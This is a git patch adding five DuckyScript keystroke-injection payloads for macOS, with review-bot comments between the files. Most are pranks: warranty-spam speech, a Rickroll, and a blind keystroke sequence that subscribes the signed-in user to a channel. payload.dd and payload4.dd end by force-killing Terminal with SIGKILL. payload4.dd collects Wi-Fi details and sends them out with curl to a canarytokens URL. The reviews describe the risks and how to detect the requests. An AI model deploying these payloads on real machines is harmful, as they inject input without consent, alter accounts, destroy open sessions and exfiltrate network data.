From c7e1b198fc953ae7c28387b3b5a4622037464875 Mon Sep 17 00:00:00 2001
From: Alex Lynd
Date: Thu, 6 Jan 2022 01:22:57 -0700
Subject: [PATCH] meow!
---
payload.dd | 8 ++++++++
payload1.dd | 7 +++++++
payload2.dd | 9 +++++++++
payload3.dd | 13 +++++++++++++
payload4.dd | 8 ++++++++
5 files changed, 45 insertions(+)
create mode 100644 payload.dd
create mode 100644 payload1.dd
create mode 100644 payload2.dd
create mode 100644 payload3.dd
create mode 100644 payload4.dd
diff --git a/payload.dd b/payload.dd
new file mode 100644
index 0000000..97d71dc
--- /dev/null
+++ b/payload.dd
@@ -0,0 +1,8 @@
+REM This is the "Rush" Payload, it asks if you want to extend your car's warranty on MacOS (taken from voicemail transcript) by @skicka
+GUI SPACE
+DELAY 500
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING say "Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders." && kill -9 $(ps -p $PPID -o ppid=)
+ENTER
\ No newline at end of file
diff --git a/payload1.dd b/payload1.dd
new file mode 100644
index 0000000..6d9045a
--- /dev/null
+++ b/payload1.dd
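Review bot: In payload.dd the last `STRING` line ends with `kill -9 $(ps -p $PPID -o ppid=)`, which the REM header does not mention. That sends SIGKILL to the parent of the shell's parent process, presumably the Terminal application itself, so every other open Terminal window and any work in it would be lost, not just the window this script opened. payload4.dd ends the same way. I would document it with a line such as `REM Ends by force-killing the Terminal app (SIGKILL); all open Terminal sessions are lost`, and consider a plain `exit` so that only the new shell closes.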
@@ -0,0 +1,7 @@
+REM Extended Warranty Reminder, opens TextEdit on MacOS and types contents of spam voicemail, by @Skickar 2022
+GUI SPACE
+STRING textedit
+ENTER
+DELAY 1000
+CTRL N
+STRING Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders.
diff --git a/payload2.dd b/payload2.dd
new file mode 100644
index 0000000..603ae5b
--- /dev/null
+++ b/payload2.dd
@@ -0,0 +1,9 @@
+REM Quick Rickroller, opens Rickroll video on MacOS via Terminal and plays by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING open "https://youtu.be/dQw4w9WgXcQ"
+ENTER
+DELAY 2000
+SPACE
\ No newline at end of file
diff --git a/payload3.dd b/payload3.dd
new file mode 100644
index 0000000..cf542a6
--- /dev/null
+++ b/payload3.dd
@@ -0,0 +1,13 @@
+REM Quick Hak5 Channel Subscriber, opens hak5 subscribe link via terminal, tabs twice, and hits enter to subscribe on MacOS by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING open "https://www.youtube.com/c/hak5?sub_confirmation=1"
+DELAY 500
+ENTER
+DELAY 4000
+TAB
+TAB
+ENTER
+ENTER
\ No newline at end of file
diff --git a/payload4.dd b/payload4.dd
new file mode 100644
index 0000000..81219f7
--- /dev/null
+++ b/payload4.dd
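Review bot: In payload3.dd the `TAB`, `TAB`, `ENTER`, `ENTER` sequence after `DELAY 4000` is sent blind, so it lands on whatever window and control has focus at that moment. If the page loads slowly, the layout differs, or another application takes focus, those `ENTER` presses confirm something other than the intended dialog. In the intended case they change the signed-in user's account without any prompt. The REM header should state both the assumption and the side effect, for example `REM Assumes the default browser is focused and signed in within 4 s; modifies the user's YouTube subscriptions`.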
@@ -0,0 +1,8 @@
+REM Wi-Fi Network setting exfil, takes current network information & sends it as user agent to a canary token, by @Skickar 2022
+GUI SPACE
+STRING terminal.app
+ENTER
+DELAY 2000
+STRING curl --silent --output /dev/null --user-agent $(airport --getinfo | sed 1d | xargs | tr -d ' ' | tr -d '-') http://canarytokens.com/terms/tags/9sh0p7if7ei3j6z9mfwvrt9d9/post.js && wait && kill -9 $(ps -p $PPID -o ppid=)
+DELAY 500
+ENTER
\ No newline at end of file
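Review bot: In payload4.dd the `curl` line hard-codes what looks like a live token URL (`http://canarytokens.com/terms/tags/…/post.js`), so anyone who runs the file as committed reports their Wi-Fi details to whoever owns that token, over plain HTTP where the User-Agent is readable on the path. I would commit a labelled placeholder instead, e.g. `http://canarytokens.com/<YOUR_TOKEN_PATH>`, and have the REM header say exactly which fields leave the machine. For anyone triaging this on a host or proxy, the visible artefact is an outbound request to canarytokens.com whose User-Agent is presumably a run of `key:value` network fields rather than a browser string. The trailing `kill -9 $(ps -p $PPID -o ppid=)` is the same undocumented force-kill as in payload.dd.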